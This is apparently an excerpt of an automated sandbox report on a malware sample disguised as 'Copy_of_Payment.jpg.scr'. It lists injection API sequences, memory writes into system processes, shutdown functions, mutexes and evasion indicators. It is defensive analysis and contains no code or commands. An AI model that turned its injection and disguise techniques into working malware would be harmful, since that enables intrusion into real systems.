Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Code function: 3_2_003CB770 NtQueryInformationProcess,CloseHandle,NtCreateThread,
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Code function: 3_2_0040C467 GetCurrentProcess,WriteProcessMemory,NtCreateThread,
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Code function: 3_2_0040B826 NtCreateUserProcess,GetProcessId,GetThreadContext,SetThreadContext,VirtualFreeEx,CloseHandle,
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Code function: 3_2_0040B770 NtQueryInformationProcess,CloseHandle,NtCreateThread,
Source: C:\Windows\System32\dwm.exe	Code function: 4_2_0021B770 NtQueryInformationProcess,CloseHandle,NtCreateThread,
Source: C:\Program Files\Windows Mail\WinMail.exe	Code function: 7_2_0485B770 NtQueryInformationProcess,CloseHandle,NtCreateThread,
Source: C:\Windows\explorer.exe	Code function: 8_2_029AB770 NtQueryInformationProcess,CloseHandle,NtCreateThread,
Source: C:\Windows\System32\taskhost.exe	Code function: 10_2_01A4B770 NtQueryInformationProcess,CloseHandle,NtCreateThread,
Source: C:\Windows\System32\cmd.exe	Code function: 12_2_0003B770 NtQueryInformationProcess,CloseHandle,NtCreateThread,
Source: C:\Windows\System32\conhost.exe	Code function: 16_2_001AB770 NtQueryInformationProcess,CloseHandle,NtCreateThread,
Source: C:\Windows\System32\HOSTNAME.EXE	Code function: 18_2_0003B770 NtQueryInformationProcess,CloseHandle,NtCreateThread,
Source: C:\Windows\System32\tasklist.exe	Code function: 19_2_0003B770 NtQueryInformationProcess,CloseHandle,NtCreateThread,
Source: C:\Windows\System32\ipconfig.exe	Code function: 20_2_0003B770 NtQueryInformationProcess,CloseHandle,NtCreateThread,
Source: C:\Windows\System32\netsh.exe	Code function: 21_2_0014B770 NtQueryInformationProcess,CloseHandle,NtCreateThread,

Contains functionality to launch a process as a different user

Show sources

Source: C:\Copy_of_Payment.jpg.scr

Code function: 1_2_0042EE7B LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessAsUserW,CloseHandle,CloseHandle,CloseHandle,FreeLibrary,

Contains functionality to shutdown / reboot the system

Show sources

Source: C:\Copy_of_Payment.jpg.scr	Code function: 1_2_00419C31 CreateMutexW,ExitWindowsEx,OpenEventW,CloseHandle,SetEvent,CloseHandle,CloseHandle,GetFileAttributesExW,Sleep,GetFileAttributesExW,Sleep,IsWellKnownSid,GetFileAttributesExW,GetFileAttributesExW,VirtualFree,CreateEventW,WaitForSingleObject,WaitForMultipleObjects,CloseHandle,CloseHandle,CloseHandle,CloseHandle,
Source: C:\Copy_of_Payment.jpg.scr	Code function: 1_2_00414855 InitiateSystemShutdownExW,ExitWindowsEx,
Source: C:\Copy_of_Payment.jpg.scr	Code function: 1_2_00419A1F ExitWindowsEx,
Source: C:\Copy_of_Payment.jpg.scr	Code function: 1_1_00419C31 CreateMutexW,ExitWindowsEx,OpenEventW,CloseHandle,SetEvent,CloseHandle,CloseHandle,GetFileAttributesExW,Sleep,GetFileAttributesExW,Sleep,IsWellKnownSid,GetFileAttributesExW,GetFileAttributesExW,VirtualFree,CreateEventW,WaitForSingleObject,WaitForMultipleObjects,CloseHandle,CloseHandle,CloseHandle,CloseHandle,
Source: C:\Copy_of_Payment.jpg.scr	Code function: 1_1_00414855 InitiateSystemShutdownExW,ExitWindowsEx,
Source: C:\Copy_of_Payment.jpg.scr	Code function: 1_1_00419A1F ExitWindowsEx,
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Code function: 3_2_003D4855 InitiateSystemShutdownExW,ExitWindowsEx,
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Code function: 3_2_003D9A1F ExitWindowsEx,
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Code function: 3_2_003D9C31 CreateMutexW,ExitWindowsEx,OpenEventW,CloseHandle,SetEvent,CloseHandle,CloseHandle,GetFileAttributesExW,Sleep,GetFileAttributesExW,Sleep,IsWellKnownSid,GetFileAttributesExW,GetFileAttributesExW,VirtualFree,CreateEventW,WaitForSingleObject,WaitForMultipleObjects,CloseHandle,CloseHandle,CloseHandle,CloseHandle,
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Code function: 3_2_00419C31 CreateMutexW,ExitWindowsEx,OpenEventW,CloseHandle,SetEvent,CloseHandle,CloseHandle,GetFileAttributesExW,Sleep,GetFileAttributesExW,Sleep,IsWellKnownSid,GetFileAttributesExW,GetFileAttributesExW,VirtualFree,CreateEventW,WaitForSingleObject,WaitForMultipleObjects,CloseHandle,CloseHandle,CloseHandle,CloseHandle,
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Code function: 3_2_00414855 InitiateSystemShutdownExW,ExitWindowsEx,
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Code function: 3_2_00419A1F ExitWindowsEx,
Source: C:\Windows\System32\dwm.exe	Code function: 4_2_00229C31 CreateMutexW,ExitWindowsEx,OpenEventW,CloseHandle,SetEvent,CloseHandle,CloseHandle,GetFileAttributesExW,Sleep,GetFileAttributesExW,Sleep,IsWellKnownSid,GetFileAttributesExW,GetFileAttributesExW,VirtualFree,CreateEventW,WaitForSingleObject,WaitForMultipleObjects,CloseHandle,CloseHandle,CloseHandle,CloseHandle,
Source: C:\Windows\System32\dwm.exe	Code function: 4_2_00224855 InitiateSystemShutdownExW,ExitWindowsEx,
Source: C:\Windows\System32\dwm.exe	Code function: 4_2_00229A1F ExitWindowsEx,
Source: C:\Program Files\Windows Mail\WinMail.exe	Code function: 7_2_04864855 InitiateSystemShutdownExW,ExitWindowsEx,
Source: C:\Program Files\Windows Mail\WinMail.exe	Code function: 7_2_04869A1F ExitWindowsEx,
Source: C:\Program Files\Windows Mail\WinMail.exe	Code function: 7_2_04869C31 CreateMutexW,ExitWindowsEx,OpenEventW,CloseHandle,SetEvent,CloseHandle,CloseHandle,GetFileAttributesExW,Sleep,GetFileAttributesExW,Sleep,IsWellKnownSid,GetFileAttributesExW,GetFileAttributesExW,VirtualFree,CreateEventW,WaitForSingleObject,WaitForMultipleObjects,CloseHandle,CloseHandle,CloseHandle,CloseHandle,
Source: C:\Windows\explorer.exe	Code function: 8_2_029B4855 InitiateSystemShutdownExW,ExitWindowsEx,
Source: C:\Windows\explorer.exe	Code function: 8_2_029B9C31 CreateMutexW,ExitWindowsEx,OpenEventW,CloseHandle,SetEvent,CloseHandle,CloseHandle,GetFileAttributesExW,Sleep,GetFileAttributesExW,Sleep,IsWellKnownSid,GetFileAttributesExW,GetFileAttributesExW,VirtualFree,CreateEventW,WaitForSingleObject,WaitForMultipleObjects,CloseHandle,CloseHandle,CloseHandle,CloseHandle,
Source: C:\Windows\explorer.exe	Code function: 8_2_029B9A1F ExitWindowsEx,
Source: C:\Windows\System32\taskhost.exe	Code function: 10_2_01A59C31 CreateMutexW,ExitWindowsEx,OpenEventW,CloseHandle,SetEvent,CloseHandle,CloseHandle,GetFileAttributesExW,Sleep,GetFileAttributesExW,Sleep,IsWellKnownSid,GetFileAttributesExW,GetFileAttributesExW,VirtualFree,CreateEventW,WaitForSingleObject,WaitForMultipleObjects,CloseHandle,CloseHandle,CloseHandle,CloseHandle,
Source: C:\Windows\System32\taskhost.exe	Code function: 10_2_01A54855 InitiateSystemShutdownExW,ExitWindowsEx,
Source: C:\Windows\System32\taskhost.exe	Code function: 10_2_01A59A1F ExitWindowsEx,
Source: C:\Windows\System32\cmd.exe	Code function: 12_2_00049A1F ExitWindowsEx,
Source: C:\Windows\System32\cmd.exe	Code function: 12_2_00044855 InitiateSystemShutdownExW,ExitWindowsEx,
Source: C:\Windows\System32\cmd.exe	Code function: 12_2_00049C31 CreateMutexW,ExitWindowsEx,OpenEventW,CloseHandle,SetEvent,CloseHandle,CloseHandle,GetFileAttributesExW,Sleep,GetFileAttributesExW,Sleep,IsWellKnownSid,GetFileAttributesExW,GetFileAttributesExW,VirtualFree,CreateEventW,WaitForSingleObject,WaitForMultipleObjects,CloseHandle,CloseHandle,CloseHandle,CloseHandle,
Source: C:\Windows\System32\conhost.exe	Code function: 16_2_001B9C31 CreateMutexW,ExitWindowsEx,OpenEventW,CloseHandle,SetEvent,CloseHandle,CloseHandle,GetFileAttributesExW,Sleep,GetFileAttributesExW,Sleep,IsWellKnownSid,GetFileAttributesExW,GetFileAttributesExW,VirtualFree,CreateEventW,WaitForSingleObject,WaitForMultipleObjects,CloseHandle,CloseHandle,CloseHandle,CloseHandle,
Source: C:\Windows\System32\conhost.exe	Code function: 16_2_001B4855 InitiateSystemShutdownExW,ExitWindowsEx,
Source: C:\Windows\System32\conhost.exe	Code function: 16_2_001B9A1F ExitWindowsEx,
Source: C:\Windows\System32\HOSTNAME.EXE	Code function: 18_2_00049A1F ExitWindowsEx,
Source: C:\Windows\System32\HOSTNAME.EXE	Code function: 18_2_00044855 InitiateSystemShutdownExW,ExitWindowsEx,
Source: C:\Windows\System32\HOSTNAME.EXE	Code function: 18_2_00049C31 CreateMutexW,ExitWindowsEx,OpenEventW,CloseHandle,SetEvent,CloseHandle,CloseHandle,GetFileAttributesExW,Sleep,GetFileAttributesExW,Sleep,IsWellKnownSid,GetFileAttributesExW,GetFileAttributesExW,VirtualFree,CreateEventW,WaitForSingleObject,WaitForMultipleObjects,CloseHandle,CloseHandle,CloseHandle,CloseHandle,
Source: C:\Windows\System32\tasklist.exe	Code function: 19_2_00049A1F ExitWindowsEx,
Source: C:\Windows\System32\tasklist.exe	Code function: 19_2_00044855 InitiateSystemShutdownExW,ExitWindowsEx,
Source: C:\Windows\System32\tasklist.exe	Code function: 19_2_00049C31 CreateMutexW,ExitWindowsEx,OpenEventW,CloseHandle,SetEvent,CloseHandle,CloseHandle,GetFileAttributesExW,Sleep,GetFileAttributesExW,Sleep,IsWellKnownSid,GetFileAttributesExW,GetFileAttributesExW,VirtualFree,CreateEventW,WaitForSingleObject,WaitForMultipleObjects,CloseHandle,CloseHandle,CloseHandle,CloseHandle,
Source: C:\Windows\System32\ipconfig.exe	Code function: 20_2_00049A1F ExitWindowsEx,
Source: C:\Windows\System32\ipconfig.exe	Code function: 20_2_00044855 InitiateSystemShutdownExW,ExitWindowsEx,
Source: C:\Windows\System32\ipconfig.exe	Code function: 20_2_00049C31 CreateMutexW,ExitWindowsEx,OpenEventW,CloseHandle,SetEvent,CloseHandle,CloseHandle,GetFileAttributesExW,Sleep,GetFileAttributesExW,Sleep,IsWellKnownSid,GetFileAttributesExW,GetFileAttributesExW,VirtualFree,CreateEventW,WaitForSingleObject,WaitForMultipleObjects,CloseHandle,CloseHandle,CloseHandle,CloseHandle,
Source: C:\Windows\System32\netsh.exe	Code function: 21_2_00159C31 CreateMutexW,ExitWindowsEx,OpenEventW,CloseHandle,SetEvent,CloseHandle,CloseHandle,GetFileAttributesExW,Sleep,GetFileAttributesExW,Sleep,IsWellKnownSid,GetFileAttributesExW,GetFileAttributesExW,VirtualFree,CreateEventW,WaitForSingleObject,WaitForMultipleObjects,CloseHandle,CloseHandle,CloseHandle,CloseHandle,
Source: C:\Windows\System32\netsh.exe	Code function: 21_2_00159A1F ExitWindowsEx,
Source: C:\Windows\System32\netsh.exe	Code function: 21_2_00154855 InitiateSystemShutdownExW,ExitWindowsEx,

Creates mutexes

Show sources

Source: C:\Windows\System32\dwm.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{A1930FBF-81C9-2065-646C-C256E8E9ABF3}
Source: C:\Windows\explorer.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{BBA95F00-D176-3A5F-8FDB-43BB035E2A1E}
Source: C:\Windows\System32\dwm.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{DF64CA70-4406-5E92-8FDB-43BB035E2A1E}
Source: C:\Windows\System32\dwm.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{277D87E8-099E-A68B-8FDB-43BB035E2A1E}
Source: C:\Windows\System32\dwm.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{A1930FBF-81C9-2065-A463-C25628E6ABF3}
Source: C:\Windows\explorer.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{BE827C64-F212-3F74-8FDB-43BB035E2A1E}
Source: C:\Windows\explorer.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{D2493500-BB76-53BF-8FDB-43BB035E2A1E}
Source: C:\Windows\System32\netsh.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{83400BFC-858A-02B6-8FDB-43BB035E2A1E}
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{A1930FBF-81C9-2065-5C6A-C256D0EFABF3}
Source: C:\Windows\System32\dwm.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{A1930FBF-81C9-2065-5867-C256D4E2ABF3}
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{A1930FBF-81C9-2065-606F-C256ECEAABF3}
Source: C:\Windows\System32\dwm.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{A1930FBF-81C9-2065-8C66-C25600E3ABF3}
Source: C:\Windows\System32\dwm.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{A1930FBF-81C9-2065-6068-C256ECEDABF3}
Source: C:\Windows\System32\dwm.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{A1930FBF-81C9-2065-E466-C25668E3ABF3}
Source: C:\Windows\System32\dwm.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{A1930FBF-81C9-2065-7465-C256F8E0ABF3}
Source: C:\Windows\System32\dwm.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{A1930FBF-81C9-2065-406B-C256CCEEABF3}
Source: C:\Windows\explorer.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{BE827C65-F213-3F74-8FDB-43BB035E2A1E}
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{F4C2AF41-2137-7534-8FDB-43BB035E2A1E}
Source: C:\Windows\System32\netsh.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{AEDBB934-3742-2F2D-8FDB-43BB035E2A1E}
Source: C:\Windows\System32\dwm.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{A1930FBF-81C9-2065-6C63-C256E0E6ABF3}
Source: C:\Windows\System32\dwm.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{A1930FBF-81C9-2065-B467-C25638E2ABF3}
Source: C:\Windows\System32\dwm.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{A1930FBF-81C9-2065-1864-C25694E1ABF3}
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{A1930FBF-81C9-2065-4462-C256C8E7ABF3}
Source: C:\Windows\explorer.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{41C11083-9EF5-C037-8FDB-43BB035E2A1E}
Source: C:\Windows\System32\dwm.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{A1930FBF-81C9-2065-5C63-C256D0E6ABF3}
Source: C:\Windows\System32\dwm.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{A1930FBF-81C9-2065-0066-C2568CE3ABF3}
Source: C:\Windows\System32\dwm.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{A1930FBF-81C9-2065-8863-C25604E6ABF3}
Source: C:\Windows\System32\dwm.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{A1930FBF-81C9-2065-BC60-C25630E5ABF3}
Source: C:\Windows\System32\cmd.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{A1930FBF-81C9-2065-206E-C256ACEBABF3}
Source: C:\Windows\System32\dwm.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{A1930FBF-81C9-2065-A065-C2562CE0ABF3}
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{A1930FBF-81C9-2065-9C63-C25610E6ABF3}
Source: C:\Copy_of_Payment.jpg.scr	Mutant created: \Sessions\1\BaseNamedObjects\Global\{4EDB8A0A-047C-CF2D-8FDB-43BB035E2A1E}
Source: C:\Windows\System32\dwm.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{A1930FBF-81C9-2065-F461-C25678E4ABF3}
Source: C:\Windows\System32\dwm.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{A1930FBF-81C9-2065-7462-C256F8E7ABF3}
Source: C:\Windows\System32\dwm.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{A1930FBF-81C9-2065-3866-C256B4E3ABF3}
Source: C:\Windows\System32\dwm.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{A1930FBF-81C9-2065-C46A-C25648EFABF3}
Source: C:\Windows\explorer.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{ADC19AB4-14C2-2C37-8FDB-43BB035E2A1E}
Source: C:\Windows\explorer.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{56C2AFD4-21A2-D734-8FDB-43BB035E2A1E}
Source: C:\Windows\explorer.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{B26EAB50-2526-3398-8FDB-43BB035E2A1E}
Source: C:\Windows\System32\dwm.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{DF64CA73-4405-5E92-8FDB-43BB035E2A1E}
Source: C:\Windows\explorer.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{B26EAB5F-2529-3398-8FDB-43BB035E2A1E}
Source: C:\Windows\System32\dwm.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{A1930FBF-81C9-2065-6466-C256E8E3ABF3}
Source: C:\Windows\System32\dwm.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{A1930FBF-81C9-2065-E868-C25664EDABF3}
Source: C:\Windows\System32\dwm.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{A1930FBF-81C9-2065-E862-C25664E7ABF3}
Source: C:\Windows\System32\cmd.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{A1930FBF-81C9-2065-DC6D-C25650E8ABF3}
Source: C:\Windows\explorer.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{DBC662CF-ECB9-5A30-8FDB-43BB035E2A1E}
Source: C:\Windows\System32\dwm.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{A1930FBF-81C9-2065-9C62-C25610E7ABF3}
Source: C:\Windows\System32\dwm.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{A1930FBF-81C9-2065-DC66-C25650E3ABF3}
Source: C:\Windows\System32\cmd.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{A1930FBF-81C9-2065-C06E-C2564CEBABF3}
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{A1930FBF-81C9-2065-FC68-C25670EDABF3}
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{A1930FBF-81C9-2065-D86A-C25654EFABF3}
Source: C:\Windows\System32\netsh.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{D4BA9F46-1130-554C-8FDB-43BB035E2A1E}
Source: C:\Windows\explorer.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{A1930FBF-81C9-2065-C468-C25648EDABF3}
Source: C:\Windows\System32\dwm.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{A1930FBF-81C9-2065-E065-C2566CE0ABF3}
Source: C:\Windows\System32\dwm.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{A1930FBF-81C9-2065-3465-C256B8E0ABF3}
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{A1930FBF-81C9-2065-A06A-C2562CEFABF3}
Source: C:\Windows\System32\dwm.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{A1930FBF-81C9-2065-7064-C256FCE1ABF3}
Source: C:\Windows\System32\dwm.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{A1930FBF-81C9-2065-9466-C25618E3ABF3}
Source: C:\Windows\System32\dwm.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{A1930FBF-81C9-2065-A061-C2562CE4ABF3}
Source: C:\Windows\System32\cmd.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{A1930FBF-81C9-2065-D062-C2565CE7ABF3}

Deletes Internet Explorer cookies via registry

Show sources

Source: C:\Windows\System32\dwm.exe

Registry key value created / modified: HKEY_USERS\Software\Microsoft\Internet Explorer\Privacy

Enables security privileges

Show sources

Source: C:\Copy_of_Payment.jpg.scr

Process token adjusted: Security

PE file contains executable resources (Code or Archives)

Show sources

Source: ppcrlui_3580_2.3580.dr

Static PE information: Resource name: RT_STRING type: Hitachi SH big-endian COFF object, not stripped

PE file contains strange resources

Show sources

Source: Copy_of_Payment.jpg.scr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Copy_of_Payment.jpg.scr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: ubhiy.exe.3328.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: ubhiy.exe.3328.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

PE file does not import any functions

Show sources

Source: ppcrlui_3580_2.3580.dr

Static PE information: No import functions for PE file found

Reads the hosts file

Show sources

Source: C:\Windows\explorer.exe

File read: C:\Windows\System32\drivers\etc\hosts

Sample file is different than original file name gathered from version info

Show sources

Source: Copy_of_Payment.jpg.scr	Binary or memory string: OriginalFilenamePortaustin.exe vs Copy_of_Payment.jpg.scr
Source: Copy_of_Payment.jpg.scr	Binary or memory string: OriginalFilenamePortaustin.exe vs Copy_of_Payment.jpg.scr
Source: Copy_of_Payment.jpg.scr	Binary or memory string: OriginalFilenamePortaustin.exe vs Copy_of_Payment.jpg.scr

Sample reads its own file content

Show sources

Source: C:\Copy_of_Payment.jpg.scr

File read: C:\Copy_of_Payment.jpg.scr

Initial sample is a PE file and has a suspicious name

Show sources

Source: initial sample

Static PE information: Filename: Copy_of_Payment.jpg.scr

HIPS / PFW / Operating System Protection Evasion:

Contains functionality to add an ACL to a security descriptor

Show sources

Source: C:\Copy_of_Payment.jpg.scr

Code function: 1_2_00430D81 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,LocalFree,

Contains functionality to create a new security descriptor

Show sources

Source: C:\Copy_of_Payment.jpg.scr

Code function: 1_2_00430EDE AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

May try to detect the Windows Explorer process (often used for injection)

Show sources

Source: dwm.exe, explorer.exe, taskhost.exe, conhost.exe	Binary or memory string: Shell_TrayWnd@
Source: dwm.exe, explorer.exe, taskhost.exe, conhost.exe	Binary or memory string: Progman
Source: dwm.exe, explorer.exe, taskhost.exe, conhost.exe	Binary or memory string: Program Manager
Source: explorer.exe	Binary or memory string: ProgmanpyA
Source: dwm.exe, explorer.exe, taskhost.exe, conhost.exe	Binary or memory string: Shell_TrayWnd

Allocates memory in foreign processes

Show sources

Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory allocated: C:\Windows\System32\dwm.exe base: 210000 protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory allocated: C:\Windows\System32\taskhost.exe base: 1A40000 protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory allocated: C:\Program Files\Windows Mail\WinMail.exe base: 4850000 protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory allocated: unknown base: 300000 protect: page execute and read and write
Source: C:\Windows\System32\dwm.exe	Memory allocated: C:\Windows\explorer.exe base: 29A0000 protect: page execute and read and write
Source: C:\Windows\System32\dwm.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 1A0000 protect: page execute and read and write
Source: C:\Windows\System32\dwm.exe	Memory allocated: unknown base: 3C0000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\cmd.exe base: 30000 protect: page execute and read and write
Source: C:\Windows\System32\cmd.exe	Memory allocated: C:\Windows\System32\HOSTNAME.EXE base: 30000 protect: page execute and read and write
Source: C:\Windows\System32\cmd.exe	Memory allocated: C:\Windows\System32\tasklist.exe base: 30000 protect: page execute and read and write
Source: C:\Windows\System32\cmd.exe	Memory allocated: C:\Windows\System32\ipconfig.exe base: 30000 protect: page execute and read and write
Source: C:\Windows\System32\cmd.exe	Memory allocated: C:\Windows\System32\netsh.exe base: 140000 protect: page execute and read and write

Changes memory attributes in foreign processes to executable or writable

Show sources

Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory protected: C:\Windows\System32\dwm.exe base: 210000 protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory protected: C:\Windows\System32\dwm.exe base: 246D60 protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory protected: C:\Windows\System32\dwm.exe base: 246000 protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory protected: C:\Windows\System32\dwm.exe base: 246D74 protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory protected: C:\Windows\System32\dwm.exe base: 24716C protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory protected: C:\Windows\System32\dwm.exe base: 247000 protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory protected: C:\Windows\System32\dwm.exe base: 247170 protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory protected: C:\Windows\System32\taskhost.exe base: 1A40000 protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory protected: C:\Windows\System32\taskhost.exe base: 1A76D60 protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory protected: C:\Windows\System32\taskhost.exe base: 1A76000 protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory protected: C:\Windows\System32\taskhost.exe base: 1A76D74 protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory protected: C:\Windows\System32\taskhost.exe base: 1A7716C protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory protected: C:\Windows\System32\taskhost.exe base: 1A77000 protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory protected: C:\Windows\System32\taskhost.exe base: 1A77170 protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory protected: C:\Program Files\Windows Mail\WinMail.exe base: 4850000 protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory protected: C:\Program Files\Windows Mail\WinMail.exe base: 4886D60 protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory protected: C:\Program Files\Windows Mail\WinMail.exe base: 4886000 protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory protected: C:\Program Files\Windows Mail\WinMail.exe base: 4886D74 protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory protected: C:\Program Files\Windows Mail\WinMail.exe base: 488716C protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory protected: C:\Program Files\Windows Mail\WinMail.exe base: 4887000 protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory protected: C:\Program Files\Windows Mail\WinMail.exe base: 4887170 protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory protected: unknown base: 300000 protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory protected: unknown base: 336D60 protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory protected: unknown base: 336000 protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory protected: unknown base: 336D74 protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory protected: unknown base: 33716C protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory protected: unknown base: 337000 protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory protected: unknown base: 337170 protect: page execute and read and write
Source: C:\Windows\System32\dwm.exe	Memory protected: C:\Windows\explorer.exe base: 29A0000 protect: page execute and read and write
Source: C:\Windows\System32\dwm.exe	Memory protected: C:\Windows\explorer.exe base: 29D6D60 protect: page execute and read and write
Source: C:\Windows\System32\dwm.exe	Memory protected: C:\Windows\explorer.exe base: 29D6000 protect: page execute and read and write
